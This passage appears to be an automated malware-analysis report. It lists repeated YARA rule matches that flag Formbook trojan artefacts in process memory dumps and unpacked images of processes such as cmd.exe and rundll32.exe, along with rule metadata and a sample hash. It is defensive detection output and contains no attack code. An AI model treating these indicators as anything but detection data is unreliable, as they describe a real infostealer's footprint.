Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: TR0627729920002.exe PID: 5932, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cmd.exe PID: 564, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: Jwjxmakrv.exe PID: 2460, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 4684, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: TR0627729920002.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
